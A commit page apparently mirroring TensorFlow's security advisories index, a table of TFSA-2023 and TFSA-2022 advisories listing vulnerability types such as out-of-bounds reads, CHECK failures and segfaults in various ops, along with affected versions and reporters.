chore: import upstream snapshot with attribution
cffconvert / validate (push) Has been skipped
License Check / license-check (push) Failing after 2s

This commit is contained in:
wehub-resource-sync
2026-07-13 12:14:16 +08:00
commit 8a852e4b4e
36502 changed files with 9277225 additions and 0 deletions
+448
View File
@@ -0,0 +1,448 @@
# TensorFlow Security Advisories
C++ fuzzing: [![Fuzzing Status](https://oss-fuzz-build-logs.storage.googleapis.com/badges/tensorflow.svg)](https://bugs.chromium.org/p/oss-fuzz/issues/list?sort=-opened&can=1&q=proj:tensorflow)
Python fuzzing: [![Fuzzing Status](https://oss-fuzz-build-logs.storage.googleapis.com/badges/tensorflow-py.svg)](https://bugs.chromium.org/p/oss-fuzz/issues/list?sort=-opened&can=1&q=proj:tensorflow-py)
We regularly publish security advisories about using TensorFlow.
*Note*: In conjunction with these security advisories, we strongly encourage
TensorFlow users to read and understand TensorFlow's security model as outlined
in
[SECURITY.md](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md).
| Advisory Number | Type | Versions affected | Reported by | Additional Information
| ------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------- | :-----------------: | ---------------------------------------------------------------------------------- | --------------------------------------------------------------
| [TFSA-2023-020](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-020.md) | OOB Read in GRUBlockCellGrad | <= 2.12.0 | r3pwnx of 360 AIVul Team |
| [TFSA-2023-019](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-019.md) | FPE in AvgPoolGrad with XLA | <= 2.12.0 | r3pwnx of 360 AIVul Team |
| [TFSA-2023-018](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-018.md) | OOB read in DynamicStitch | <= 2.12.0 | Google OSS VRP |
| [TFSA-2023-017](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-017.md) | NPE in QuantizedMatMulWithBiasAndDequantize | <= 2.12.0 | r3pwnx of 360 AIVul Team |
| [TFSA-2023-016](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-016.md) | Seg fault in `tf.raw_ops.Print` | <= 2.12.0 | Yu Tian of Qihoo 360 AIVul Team |
| [TFSA-2023-015](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-015.md) | Segmentation fault in tfg-translate | <= 2.12.0 | r3pwnx of 360 AIVul Team |
| [TFSA-2023-014](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-014.md) | Integer overflow in EditDistance | <= 2.12.0 | r3pwnx of 360 AIVul Team |
| [TFSA-2023-013](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-013.md) | FPE in TensorListSplit with XLA | <= 2.12.0 | r3pwnx of 360 AIVul Team |
| [TFSA-2023-012](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-012.md) | NPE in TensorArrayConcatV2 | <= 2.12.0 | Yu Tian of Qihoo 360 AIVul Team |
| [TFSA-2023-011](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-011.md) | FPE in TensorListSplit with XLA | <= 2.12.0 | r3pwnx of 360 AIVul Team |
| [TFSA-2023-010](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-010.md) | Heap-buffer-overflow in AvgPoolGrad | <= 2.12.0 | evn@google.com |
| [TFSA-2023-009](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-009.md) | NPE in RandomShuffle with XLA enable | <= 2.12.0 | r3pwnx of 360 AIVul Team |
| [TFSA-2023-008](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-008.md) | FPE in AudioSpectrogram | <= 2.12.0 | r3pwnx of 360 AIVul Team |
| [TFSA-2023-007](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-007.md) | Segfault in Bincount with XLA | <= 2.12.0 | r3pwnx of 360 AIVul Team |
| [TFSA-2023-006](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-006.md) | NPE in SparseSparseMaximum | <= 2.12.0 | Yu Tian of Qihoo 360 AIVul Team |
| [TFSA-2023-005](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-005.md) | Null dereference on ParallelConcat with XLA | <= 2.12.0 | r3pwnx of 360 AIVul Team |
| [TFSA-2023-004](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-004.md) | Segfault when opening multiframe gif | <= 2.12.0 | Andrei |
| [TFSA-2023-003](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-003.md) | Double free in Fractional(Max/Avg)Pool | <= 2.12.0 | https://github.com/dmc1778 of nimashiri2012@gmail.com |
| [TFSA-2023-002](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-002.md) | A heap out-of-buffer read vulnerability in the QuantizeAndDequantize operation | <= 2.12.0 | |
| [TFSA-2023-001](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2023-001.md) | FPE in TFLite in conv kernel | <= 2.12.0 | Wang Xuan of Qihoo 360 AIVul Team |
| [TFSA-2022-170](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-170.md) | `CHECK` fail in `TensorListScatter` and `TensorListScatterV2` in eager mode | <= 2.11.0 | Pattarakrit Rattankul |
| [TFSA-2022-169](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-169.md) | `CHECK` failure in `SobolSample` via missing validation | <= 2.11.0 | (multiple authors) |
| [TFSA-2022-168](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-168.md) | Heap overflow in `QuantizeAndDequantizeV2` | <= 2.11.0 | Reported via OSS VRP |
| [TFSA-2022-167](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-167.md) | OOB write in grappler | <= 2.11.0 | (discovered internally) |
| [TFSA-2022-166](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-166.md) | Invalid char to bool conversion when printing a tensor | <= 2.11.0 | (discovered internally) |
| [TFSA-2022-165](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-165.md) | FractionalMaxPool and FractionalAvgPool heap out-of-buffer | <= 2.11.0 | Reported via OSS VRP |
| [TFSA-2022-164](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-164.md) | `CHECK_EQ` fail via input in `SparseMatrixNNZ` | <= 2.11.0 | Kang Hong Jin |
| [TFSA-2022-163](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-163.md) | Segfault in `CompositeTensorVariantToComponents` | <= 2.11.0 | pattarakritr@smu.edu.sg |
| [TFSA-2022-162](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-162.md) | `CHECK` fail via inputs in `PyFunc` | <= 2.11.0 | pattarakritr@smu.edu.sg |
| [TFSA-2022-161](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-161.md) | `CHECK` fail via inputs in `SdcaOptimizer` | <= 2.11.0 | Zizhuang Deng of IIE, UCAS |
| [TFSA-2022-160](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-160.md) | `CHECK` fail via inputs in `SparseFillEmptyRowsGrad` | <= 2.11.0 | Jiawei Liu, PhD student at University of Illinois, Urbana-Champaign |
| [TFSA-2022-159](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-159.md) | `FractionalMaxPoolGrad` Heap OOB | <= 2.11.0 | Yu Tian from Qihoo 360 AIVul Team |
| [TFSA-2022-158](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-158.md) | `tf.raw_ops.Mfcc` crashes | <= 2.11.0 | Yu Tian from Qihoo 360 AIVul Team |
| [TFSA-2022-157](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-157.md) | `MirrorPadGrad` heap oob | <= 2.11.0 | Yu Tian from Qihoo 360 AIVul Team |
| [TFSA-2022-156](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-156.md) | Buffer overflow in `CONV_3D_TRANSPOSE` on TFLite | <= 2.11.0 | Thibaut Goetghebuer-Planchon, Arm Ltd. |
| [TFSA-2022-155](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-155.md) | `CHECK_EQ` fail in `tf.raw_ops.TensorListResize` | <= 2.11.0 | Pattarakrit Rattankul |
| [TFSA-2022-154](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-154.md) | Segfault in `tf.raw_ops.TensorListConcat` | <= 2.11.0 | Tong Liu, ShanghaiTech University |
| [TFSA-2022-153](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-153.md) | `CHECK` fail in `BCast` overflow | <= 2.11.0 | Pattarakrit Rattankul |
| [TFSA-2022-152](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-152.md) | Segfault via invalid attributes in `pywrap_tfe_src.cc` | <= 2.11.0 | Pattarakrit Rattankul |
| [TFSA-2022-151](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-151.md) | FPE in `tf.image.generate_bounding_box_proposals` | <= 2.11.0 | Pattarakrit Rattankul |
| [TFSA-2022-150](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-150.md) | Overflow in `tf.keras.losses.poisson` | >= 2.9.0, <= 2.11.0 | Pattarakrit Rattankul |
| [TFSA-2022-149](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-149.md) | Overflow in `ResizeNearestNeighborGrad` | <= 2.11.0 | Neophytos Christou from the Secure Systems Lab (SSL) at Brown University |
| [TFSA-2022-148](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-148.md) | Overflow in `ImageProjectiveTransformV2` | <= 2.11.0 | Neophytos Christou from the Secure Systems Lab (SSL) at Brown University |
| [TFSA-2022-147](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-147.md) | Overflow in `FusedResizeAndPadConv2D` | <= 2.11.0 | Neophytos Christou from the Secure Systems Lab (SSL) at Brown University |
| [TFSA-2022-146](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-146.md) | Seg fault in `ndarray_tensor_bridge` due to zero and large input | <= 2.11.0 | Pattarakrit Rattanukul |
| [TFSA-2022-145](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-145.md) | OOB seg fault in `DynamicStitch` due to missing validation | <= 2.11.0 | Zizhuang Deng of IIE, UCAS |
| [TFSA-2022-144](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-144.md) | ThreadUnsafeUnigramCandidateSampler Heap OOB | <= 2.11.0 | Yu Tian of Qihoo 360 AIVul Team |
| [TFSA-2022-143](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-143.md) | OOB read in `Gather_nd` op in TF Lite Micro | <= 2.10.0 | Hui Peng from Baidu Security |
| [TFSA-2022-142](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-142.md) | `CHECK`-fail in `tensorflow::full_type::SubstituteFromAttrs` | <= 2.10.0 | (discovered internally) |
| [TFSA-2022-141](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-141.md) | Integer overflow in math ops | <= 2.10.0 | (discovered internally) |
| [TFSA-2022-140](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-140.md) | Null-dereference in `mlir::tfg::TFOp::nameAttr` | <= 2.10.0 | (discovered internally) |
| [TFSA-2022-139](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-139.md) | Null-dereference in `mlir::tfg::GraphDefImporter::ConvertNodeDef` | <= 2.10.0 | (discovered internally) |
| [TFSA-2022-138](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-138.md) | Assertion fail on MLIR empty edge names | <= 2.10.0 | (discovered internally) |
| [TFSA-2022-137](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-137.md) | Null dereference on MLIR on empty function attributes | <= 2.10.0 | (discovered internally) |
| [TFSA-2022-136](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-136.md) | `CHECK` fail in `Eig` | <= 2.10.0 | 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology |
| [TFSA-2022-135](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-135.md) | `CHECK` fail in `DrawBoundingBoxes` | <= 2.10.0 | 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology |
| [TFSA-2022-134](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-134.md) | `CHECK` fail in `Unbatch` | <= 2.10.0 | 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology |
| [TFSA-2022-133](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-133.md) | `CHECK` fail in `RandomPoissonV2` | <= 2.10.0 | 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology |
| [TFSA-2022-132](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-132.md) | `CHECK` fail in `tf.random.gamma` | <= 2.10.0 | 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology |
| [TFSA-2022-131](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-131.md) | `CHECK` fail in `FakeQuantWithMinMaxVarsGradient` | <= 2.10.0 | (multiple authors) |
| [TFSA-2022-130](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-130.md) | `CHECK` fail in `FakeQuantWithMinMaxVarsPerChannelGradient` | <= 2.10.0 | (multiple authors) |
| [TFSA-2022-129](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-129.md) | `CHECK` fail in `TensorListScatter` and `TensorListScatterV2` | <= 2.10.0 | 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology |
| [TFSA-2022-128](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-128.md) | `CHECK` fail in `TensorListFromTensor` | <= 2.10.0 | 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology |
| [TFSA-2022-127](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-127.md) | `CHECK` fail in `SetSize` | <= 2.10.0 | 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology |
| [TFSA-2022-126](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-126.md) | `CHECK` fail in `CollectiveGather` | <= 2.10.0 | 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology |
| [TFSA-2022-125](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-125.md) | `CHECK` fail in `AudioSummaryV2` | <= 2.10.0 | 刘力源, Information System & Security and Countermeasures Experiments Center, Beijing Institute of Technology |
| [TFSA-2022-124](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-124.md) | Floating point exception in `Conv2D` | <= 2.10.0 | Jingyi Shi |
| [TFSA-2022-123](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-123.md) | `CHECK` fail in `tf.sparse.cross` | <= 2.10.0 | Kang Hong Jin |
| [TFSA-2022-122](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-122.md) | `CHECK` fail in `EmptyTensorList` | <= 2.10.0 | Kang Hong Jin |
| [TFSA-2022-121](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-121.md) | `CHECK` fail in `Conv2DBackpropInput` | <= 2.10.0 | Jingyi Shi |
| [TFSA-2022-120](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-120.md) | `CHECK` fail in `MaxPool` | <= 2.10.0 | Jingyi Shi |
| [TFSA-2022-119](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-119.md) | `CHECK` fail in `tf.linalg.matrix_rank` | <= 2.10.0 | Kang Hong Jin |
| [TFSA-2022-118](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-118.md) | `CHECK` fail in `DenseBincount` | <= 2.10.0 | Di Jin, Secure Systems Labs, Brown University |
| [TFSA-2022-117](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-117.md) | Segfault in `RaggedBincount` | <= 2.10.0 | Di Jin, Secure Systems Labs, Brown University |
| [TFSA-2022-116](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-116.md) | `CHECK` fail in `LRNGrad` | <= 2.10.0 | Di Jin, Secure Systems Labs, Brown University |
| [TFSA-2022-115](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-115.md) | `CHECK` fail in `ParameterizedTruncatedNormal` | <= 2.10.0 | Di Jin, Secure Systems Labs, Brown University |
| [TFSA-2022-114](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-114.md) | `CHECK` fail in `Save` and `SaveSlices` | <= 2.10.0 | Di Jin, Secure Systems Labs, Brown University |
| [TFSA-2022-113](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-113.md) | Segfault in `SparseBincount` | <= 2.10.0 | Di Jin, Secure Systems Labs, Brown University |
| [TFSA-2022-112](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-112.md) | `CHECK` fail in `QuantizeAndDequantizeV3` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-111](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-111.md) | `CHECK` fail in `RaggedTensorToVariant` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-110](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-110.md) | `CHECK` fail in `FractionalMaxPoolGrad` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-109](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-109.md) | Segfault in `QuantizedRelu` and `QuantizedRelu6` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-108](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-108.md) | Segfault in `QuantizeDownAndShrinkRange` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-107](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-107.md) | Segfault in `QuantizedMatMul` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-106](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-106.md) | `CHECK` fail in `FakeQuantWithMinMaxVarsPerChannel` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-105](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-105.md) | Segfault in `QuantizedBiasAdd` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-104](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-104.md) | Segfault in `Requantize` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-103](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-103.md) | `CHECK` fail in `FakeQuantWithMinMaxVars` | <= 2.10.0 | (multiple authors) |
| [TFSA-2022-102](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-102.md) | Segfault in `QuantizedInstanceNorm` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-101](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-101.md) | `CHECK` fail in `Conv2DBackpropInput` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-100](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-100.md) | `CHECK` fail in `AvgPoolGrad` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-099](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-099.md) | Segfault in `QuantizedAdd` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-098](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-098.md) | Segfault in `QuantizedAvgPool` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-097](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-097.md) | Segfault in `LowerBound` and `UpperBound` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-096](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-096.md) | Segfault in `BlockLSTMGradV2` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-095](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-095.md) | `CHECK` failures in `FractionalAvgPoolGrad` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-094](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-094.md) | `CHECK` failures in `AvgPool3DGrad` | <= 2.10.0 | Neophytos Christou, Secure Systems Labs, Brown University |
| [TFSA-2022-093](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-093.md) | Segfault TFLite converter on per-channel quantized transposed convolutions | <= 2.10.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/53767)
| [TFSA-2022-092](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-092.md) | `CHECK` failures in `UnbatchGradOp` | <= 2.10.0 | (multiple authors) |
| [TFSA-2022-091](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-091.md) | `CHECK` failure in `AvgPoolOp` | <= 2.10.0 | Jingyi Shi |
| [TFSA-2022-090](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-090.md) | Int overflow in `RaggedRangeOp` | <= 2.10.0 | Jingyi Shi |
| [TFSA-2022-089](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-089.md) | OOB write in `Scatter_nd` op in TF Lite | <= 2.10.0 | Hui Peng from Baidu Security |
| [TFSA-2022-088](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-088.md) | `CHECK` failure in `TensorListReserve` via missing validation | <= 2.10.0 | Kang Hong Jin from Singapore Management University |
| [TFSA-2022-087](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-087.md) | OOB read in `Gather_nd` op in TF Lite | <= 2.10.0 | Hui Peng from Baidu Security |
| [TFSA-2022-086](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-086.md) | `CHECK` failure in `SobolSample` via missing validation | <= 2.10.0 | (multiple authors) |
| [TFSA-2022-085](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-085.md) | `CHECK` failure in tf.reshape via overflows | <= 2.10.0 | Kang Hong Jin from Singapore Management University |
| [TFSA-2022-084](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-084.md) | Heap buffer overflow due to incorrect hash function | == 2.8.0 | (discovered internally) |
| [TFSA-2022-083](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-083.md) | Type confusion leading to `CHECK`-failure based denial of service | < 2.9.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/55530)
| [TFSA-2022-082](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-082.md) | Incomplete validation in signal ops leads to crashes | < 2.9.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/55263)
| [TFSA-2022-081](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-081.md) | Core dump when loading TFLite models with quantization | < 2.9.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/43661)
| [TFSA-2022-080](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-080.md) | Segfault if `tf.histogram_fixed_width` is called with NaN values | < 2.9.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/45770)
| [TFSA-2022-079](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-079.md) | Denial of service in `tf.ragged.constant` due to lack of validation | < 2.9.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/55199)
| [TFSA-2022-078](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-078.md) | Missing validation causes denial of service via `Conv3DBackpropFilterV2` | < 2.9.0 | (Reported on GitHub) | [issue](https://github.com/tensorflow/tensorflow/issues/55305)
| [TFSA-2022-077](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-077.md) | Segfault and OOB write due to incomplete validation in `EditDistance` | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University |
| [TFSA-2022-076](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-076.md) | Integer overflow in `SpaceToBatchND` | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University |
| [TFSA-2022-075](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-075.md) | Missing validation results in undefined behavior in `QuantizedConv2D` | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University |
| [TFSA-2022-074](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-074.md) | Missing validation results in undefined behavior in `SparseTensorDenseAdd` | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University |
| [TFSA-2022-073](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-073.md) | Segfault due to missing support for quantized types | < 2.9.0 | Hong Jin, Singapore Management University |
| [TFSA-2022-072](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-072.md) | Undefined behavior when users supply invalid resource handles | < 2.9.0 | Hong Jin, Singapore Management University |
| [TFSA-2022-071](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-071.md) | `CHECK` failure in depthwise ops via overflows | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University |
| [TFSA-2022-070](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-070.md) | Missing validation causes denial of service via `Conv3DBackpropFilterV2` | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University |
| [TFSA-2022-069](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-069.md) | Missing validation causes denial of service via `LSTMBlockCell` | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University |
| [TFSA-2022-068](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-068.md) | Missing validation causes denial of service via `SparseTensorToCSRSparseMatrix` | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University |
| [TFSA-2022-067](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-067.md) | Missing validation causes denial of service via `LoadAndRemapMatrix` | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University |
| [TFSA-2022-066](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-066.md) | Missing validation causes denial of service via `UnsortedSegmentJoin` | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University |
| [TFSA-2022-065](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-065.md) | Missing validation causes denial of service via `StagePeek` | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University |
| [TFSA-2022-064](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/security/advisory/tfsa-2022-064.md) | Missing validation causes denial of service via `GetSessionTensor` | < 2.9.0 | Neophytos Christou, Secure Systems Lab, Brown University |
